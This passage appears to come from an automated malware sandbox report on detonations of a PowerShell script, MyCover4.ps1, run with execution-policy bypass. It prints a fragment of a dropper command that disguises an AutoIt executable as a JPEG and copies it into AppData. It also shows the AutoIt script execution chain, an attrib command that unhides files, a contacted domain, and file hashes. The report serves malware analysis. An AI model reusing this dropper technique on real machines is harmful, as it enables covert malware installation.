\"$Pllds\$Plqkjsd.au3\"; Copy-Item MyCover3.jpeg \"$Pllds\AutoIt3.exe\" } Catch [System.Exception]{};"

C:\Windows\system32\attrib.exe

attrib -h -s /s /d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe /ErrorStdOut "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\274872407040.au3"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.171:443 www.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 171.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 borcano.org udp
US 104.21.3.11:443 borcano.org tcp
US 8.8.8.8:53 11.3.21.104.in-addr.arpa udp

Files

memory/3632-0-0x00007FFB82C43000-0x00007FFB82C45000-memory.dmp

memory/3632-2-0x0000018D154D0000-0x0000018D154F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ght3kyqm.1y5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3632-11-0x00007FFB82C40000-0x00007FFB83701000-memory.dmp

memory/3632-12-0x00007FFB82C40000-0x00007FFB83701000-memory.dmp

memory/3632-13-0x0000018D2F8A0000-0x0000018D2F8CA000-memory.dmp

memory/3632-14-0x0000018D2F8A0000-0x0000018D2F8C4000-memory.dmp

memory/3632-15-0x00007FFB82C40000-0x00007FFB83701000-memory.dmp

memory/3632-19-0x00007FFB82C40000-0x00007FFB83701000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe

MD5 0adb9b817f1df7807576c2d7068dd931
SHA1 4a1b94a9a5113106f40cd8ea724703734d15f118
SHA256 98e4f904f7de1644e519d09371b8afcbbf40ff3bd56d76ce4df48479a4ab884b
SHA512 883aa88f2dba4214bb534fbdaf69712127357a3d0f5666667525db3c1fa351598f067068dfc9e7c7a45fed4248d7dca729ba4f75764341e47048429f9ca8846a

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\274872407040.au3

MD5 fa26096b95742e002aaa28f5add10d15
SHA1 27411586e4b2082750df480d9725c535f86b8f4c
SHA256 dce814637339057cd26d594d6b1dafad71f805d596f4c0dd3d6707136a7e4eaf
SHA512 2699af7e5435fc7b8e4b774690592f499f43a5420a005c2379ee343e038d4a5b723f0912ea1e3c03c1670ef01582ff90198010adfcf0cb263ee3115c1c75f57f

memory/3920-22-0x0000000008C10000-0x0000000009238000-memory.dmp

memory/3920-32-0x0000000009FC0000-0x0000000009FDA000-memory.dmp

memory/3920-33-0x000000000A020000-0x000000000A056000-memory.dmp

memory/3920-34-0x000000000A6E0000-0x000000000AD5A000-memory.dmp

memory/3920-35-0x000000000A100000-0x000000000A196000-memory.dmp

memory/3920-36-0x000000000A090000-0x000000000A0B2000-memory.dmp

memory/3920-37-0x000000000A210000-0x000000000A276000-memory.dmp

memory/3920-38-0x000000000B310000-0x000000000B8B4000-memory.dmp

memory/3920-39-0x000000000A1C0000-0x000000000A1DE000-memory.dmp

memory/3920-40-0x000000000A2D0000-0x000000000A31A000-memory.dmp

memory/3920-41-0x000000000BCC0000-0x000000000C014000-memory.dmp

memory/3920-42-0x000000000A510000-0x000000000A576000-memory.dmp

memory/3920-43-0x000000000A5B0000-0x000000000A5D2000-memory.dmp

memory/3920-44-0x000000000B170000-0x000000000B1BC000-memory.dmp

memory/3920-45-0x000000000D200000-0x000000000D3C2000-memory.dmp

memory/3920-46-0x000000000D900000-0x000000000DE2C000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-12 05:58

Reported

2024-06-12 06:00

Platform

win10v2004-20240611-en

Max time kernel

149s

Max time network

152s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover4.ps1

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover4.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 26.73.42.20.in-addr.arpa udp

Files

memory/4348-0-0x00007FFA4CFB3000-0x00007FFA4CFB5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s4mbk0p1.1wr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4348-10-0x0000013B20CC0000-0x0000013B20CE2000-memory.dmp

memory/4348-11-0x00007FFA4CFB0000-0x00007FFA4DA71000-memory.dmp

memory/4348-12-0x00007FFA4CFB0000-0x00007FFA4DA71000-memory.dmp

memory/4348-14-0x00007FFA4CFB0000-0x00007FFA4DA71000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-12 05:58

Reported

2024-06-12 06:00

Platform

win7-20240508-en

Max time kernel

122s

Max time network

123s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover4.ps1

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover4.ps1

Network

N/A

Files

memory/2460-4-0x000007FEF5F2E000-0x000007FEF5F2F000-memory.dmp

memory/2460-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

memory/2460-6-0x0000000001E90000-0x0000000001E98000-memory.dmp

memory/2460-7-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

memory/2460-8-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

memory/2460-9-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

memory/2460-10-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

memory/2460-11-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-12 05:58

Reported

2024-06-12 06:00

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

51s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover4.ps1

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover4.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/3116-0-0x00007FFB795C3000-0x00007FFB795C5000-memory.dmp

memory/3116-2-0x000001BF604F0000-0x000001BF60512000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eq0tw4oi.lr5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3116-11-0x00007FFB795C0000-0x00007FFB7A081000-memory.dmp

memory/3116-12-0x00007FFB795C0000-0x00007FFB7A081000-memory.dmp

memory/3116-15-0x00007FFB795C0000-0x00007FFB7A081000-memory.dmp

memory/3116-16-0x00007FFB795C0000-0x00007FFB7A081000-memory.dmp